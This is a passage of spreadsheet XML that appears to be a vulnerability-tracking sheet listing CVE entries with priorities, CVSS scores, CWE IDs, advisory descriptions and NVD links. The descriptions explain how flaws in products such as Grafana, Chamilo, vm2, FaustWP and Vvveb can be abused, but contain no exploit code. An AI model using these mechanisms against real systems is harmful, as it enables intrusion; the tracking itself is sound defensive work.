      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Spoofing vulnerability in team-alembic ash_authentication allows an attacker who operates one identity-provider connection of a dynamic_oidc strategy to be signed in as a local user established through a different connection.
The strategy is meant to keep each connection in its own identity namespace by writing every UserIdentity row's strategy field as "&lt;name&gt;/&lt;connection_id&gt;", but that namespacing never takes effect. __connection_id__ is populated only on the ephemeral runtime struct built per request in dynamic_oidc/plug.ex, and DynamicOidc.IdentityChange.change/3 re-fetches the strategy from the compile-time DSL through Info.strategy_for_action, yielding the persisted struct whose __connection_id__ is its defstruct default of nil. OAuth2.identity_strategy_name/1 therefore falls back to the bare strategy name for both the identity write and the reads in oauth2/user_resolver.ex and oauth2/sign_in_preparation.ex. Since the identity resource's unique key is (uid, strategy), one row exists per sub across every connection, and the identity-match branch runs before any email check. Neither strategy handles iss, so nothing else distinguishes the issuers: OpenID Connect Core section 5.7 makes sub unique only within an issuer, so two connections numbering subjects independently share one subject space.
This issue affects ash_authentication: from 5.0.0-rc.10 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91039</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92860</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in rcourtman Pulse up to 6.0.4/6.1.0-rc.4. Affected by this issue is the function fmt.Sprintf of the file /api/security/quick-setup of the component Quick Security Setup Handler. The manipulation of the argument Username results in improper input validation. The attack may be performed from remote. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92860</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45143</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. From 2.0.0 through at least 2.1.0, Chamilo LMS stores private Message.content without server-side sanitization and renders it as HTML in assets/vue/views/message/MessageShow.vue and public/main/template/default/message/view_message.html.twig. An authenticated low-privilege user, including a student, can directly address crafted message content to an administrator because the message creation flow permits a sender to select another user as the recipient. The content executes in the recipient's browser when the recipient opens the routine inbox or message view, without requiring a link click, and can expose session credentials or permit actions as the administrator. This vulnerability is fixed in 2.0.1.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45143</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47252</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Anyquery is an SQL query engine built on top of SQLite. Prior to 0.4.5, authenticated users with INSERT or UPDATE access to affected macOS virtual tables can execute operating-system commands because the Chrome plugin and equivalent Brave, Edge, and Safari variants interpolate a SQL-controlled URL into AppleScript or JXA source passed to osascript. In plugins/chrome/tabs.go, tabsTable.Insert() passes the URL through fmt.Sprintf(newTabScript, url), and tabsTable.Update() uses fmt.Sprintf(setURLScript, pk, url). A URL containing quote and newline characters can break out of the intended string or property record and append script statements, resulting in arbitrary command execution with the privileges of the anyquery process on the macOS host. This issue is fixed in version 0.4.5.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47252</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77903</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>9</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2026-09-17</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Microsoft Dataverse allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77903</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88795</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>The wpShopGermany IT-RECHT KANZLEI WordPress plugin before 2.4 does not generate its API authentication token securely, deriving it from data the requester controls and creating it as a side effect of the check that is supposed to validate it, allowing unauthenticated attackers to predict the token and use the access it grants to write arbitrary files, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88795</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92952</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.11.4 through 3.11.6 incompletely filter Node.js registered internal symbols across the sandbox boundary. The extraction filters in lib/setup-sandbox.js and the cross-realm symbol checks and write traps in lib/bridge.js use a fixed list of known dangerous registered symbols that omits nodejs.stream.disturbed and nodejs.stream.errored, which are exposed on host WebStream prototypes on newer Node.js releases (validated on Node.js v25.8.0). When the embedder exposes a host WebStream object and the host stream/web module to the sandbox, sandbox code can obtain the real host symbols via Object.getOwnPropertySymbols(streamWeb.ReadableStream.prototype) and use them as write keys on host stream objects, corrupting host-visible stream state — for example making stream.Readable.isDisturbed() return false for an already-consumed stream. This can bypass host logic that relies on Node's public stream-state helpers to enforce one-shot body consumption, reject errored streams, or decide whether a stream is safe to hand to another component. It is not a host code-execution primitive in the reported proof of vulnerability. This is an incomplete fix for the earlier nodejs.* symbol filtering issue. Fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92952</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14850</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>The password reset funcionality is vulnerable to unauthorized account modification due to improper validation of the user_id parameter. An attacker can manipulate this predictable numeric identifier to reset passwords for arbitrary users without proving account ownership.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14850</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15815</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59, CWE-94</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Grafana OSS and Grafana Enterprise did not safely resolve symbolic links when
extracting plugin archives. A crafted plugin archive can chain relative symbolic link
entries to escape the plugin installation directory, writing arbitrary files and an
executable backend binary outside that directory. The dropped executable runs with the
privileges of the Grafana server process, resulting in remote code execution.
Plugin archives are extracted before their signature is verified, so a valid plugin
signature does not prevent the write. An operator can therefore be affected by
installing a plugin that appears legitimate, as well as by installing a plugin from an
arbitrary archive using grafana-cli, the GF_INSTALL_PLUGINS environment variable, or
preinstall configuration.
Grafana Enterprise is affected because it includes the same plugin extraction code as
Grafana OSS.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15815</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25283</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Memory Corruption when copying unverified data from an external source exceeds the allocated buffer size.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25283</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28326</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>psirt@solarwinds.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>SolarWinds Access Rights Manager was reported to be affected by an unauthenticated remote code execution vulnerability. The issue stems from a hardcoded static key.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28326</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54239</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-639</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Faust.js is a headless WordPress toolkit. Prior to 1.8.11, the FaustWP WordPress plugin authenticates only the ciphertext in its token envelope and excludes the 16-byte initialization vector from the HMAC in WPE\FaustWP\Auth\encrypt() and WPE\FaustWP\Auth\decrypt() in plugins/faustwp/includes/auth/functions.php. A logged-in non-administrator who obtains an authorization code from GET /generate can modify the unauthenticated initialization vector so that CBC decryption changes the token type and user identifier while the HMAC remains valid. This can produce an access token for an Administrator and permit full WordPress REST API access, administrator-account creation, plugin installation, and arbitrary code execution. This issue is fixed in repository version 1.8.11.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54239</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54504</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr"/>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>MCP Documentation Server is a local-first document management and semantic search server for AI coding agents. From 1.13.0 until 1.13.1, the automatically started Web UI in src/server.ts calls startWebServer in src/web-server.ts with START_WEB_UI enabled by default and WEB_PORT set to 3080. startWebServer uses app.listen(PORT) without a host, which binds the unauthenticated document-management API to all interfaces rather than localhost. A network-reachable client can invoke GET /api/documents, GET /api/documents/:id, POST /api/documents, POST /api/search-all, DELETE /api/documents/:id, and GET /api/config without credentials to enumerate and read documents, search the corpus, insert or delete documents, and tamper with the MCP assistant's knowledge base. The service must be reachable from the attacker's LAN, VM network, container bridge, VPN, or another routed network, and the issue does not provide remote code execution. This issue is fixed in 1.13.1.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54504</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54519</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>AI Agent Automation is a modular AI agent workflow automation platform with schedulers, tools, and observability. Prior to 0.9.1, backend/src/controllers/memory.controller.js authenticates requests but listMemories, deleteMemory, and clearAgentMemory use a caller-supplied agentId or memory _id without verifying through the related Agent that the record belongs to req.user. An authenticated attacker who knows or obtains another user's identifiers can read victim AgentMemory content, including conversation history, agent context, task data, embeddings, and metadata, delete an individual victim memory, or clear all memory belonging to a victim agent. This breaks tenant isolation and causes unauthorized disclosure and data loss. This issue is fixed in version 0.9.1.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54519</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54612</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. From 1.0.0 until 1.0.8.5, saveGlobalElements() in admin/controller/editor/global-trait.php concatenates the attacker-controlled file portion of data-v-save-global to the active theme directory before loadHTMLFile() and file_put_contents() operate on it. An authenticated user with the default Editor role and editor/* permission can submit crafted HTML to module=editor/editor&amp;action=save and traverse to an existing writable PHP file outside the theme directory. If the target is web-accessible, editor-controlled PHP content executes in the web server context; a shipped public/vadmin/index.php entrypoint can be used as an execution trampoline rather than requiring a test-only file. This can permit persistent webshell placement and compromise application confidentiality, integrity, and availability. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54612</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54671</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
